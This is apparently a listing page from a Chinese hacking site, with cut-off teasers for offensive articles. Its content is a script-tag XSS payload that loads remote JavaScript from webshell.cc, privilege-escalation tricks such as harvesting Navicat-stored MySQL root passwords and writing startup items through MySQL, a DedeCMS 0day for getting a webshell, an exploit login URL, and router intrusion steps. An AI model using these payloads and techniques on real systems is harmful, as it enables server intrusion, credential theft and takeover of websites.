77种XSS跨站脚本攻击

1)普通的XSS JavaScript注入 <script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script> (2)IMG标签XSS使用JavaScript命令 <script type="text/javascript" src="http://webshell.cc/XSS/x...

- 阅读全文 -

突破ACL表过滤进行提权

一日从朋友处得到一网站权限,让我帮忙提权。拿到后看了看,C、D盘有只读权限,C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用, 终端端口被改成45678 。试了试从外网连不上45678端口,用LCX也导不出来,本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限...

- 阅读全文 -

渗透底层路由技术 渗透底层路由简化入侵过程

掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制为代理跳板,仿伪攻击等。可以说这是一种"高水平"的黑客技术手段。     首先,我们要准备的东西:"SolarWinds.Engineers.Toolset"。   我们先来打开Cisco Tools里的"IP Network browser"输入我们要扫描的I...

- 阅读全文 -

利用navicat提权

navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到 有两个方法提权: . 1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到C:\My Documents\Navicat\MySQLlogs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt 2、navicat管理的MySQL服务器信息(一般是root帐户)是存在...

- 阅读全文 -

美国大牛制造出黑客无人飞机

两位美国计算机安全专家自己制造了能够从空中展开网络袭击、监控移动电话的 小型无人驾驶飞机,它名为“无线空中监视平台”,由一架美国军用无人靶机改造而成。 计算机安全专家理查德·帕金斯和迈克·塔赛伊对这架无人靶机进行了特殊改造, 让它能够发现、追踪互联网目标和移动电话。除此之外,它还能够识别未加密的网络入口, 然后利用它们对计算机系统发动网络袭击。 能袭击网络和手机   这架自制黑客无人机能破解手机的...

- 阅读全文 -

root用户提权之mysql写入启动项提权

实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup" 1、连接到对方MYSQL 服务器 mysql -u r...

- 阅读全文 -

dedecms最新0day利用不进后台直接拿WEBSHELL

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞 (https://www.webshell.cc/313.html) 拿webshell的方法如下: 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1...

- 阅读全文 -

dedecms织梦暴最新严重0day漏洞

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。 今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞, 近期官方会发布相关补丁,望大家及时关注补丁动态。” 入侵EXP如下: https://www.webshell.cc/dede/login.php?dopost=login&validate=dcug&userid=admin&pwd...

- 阅读全文 -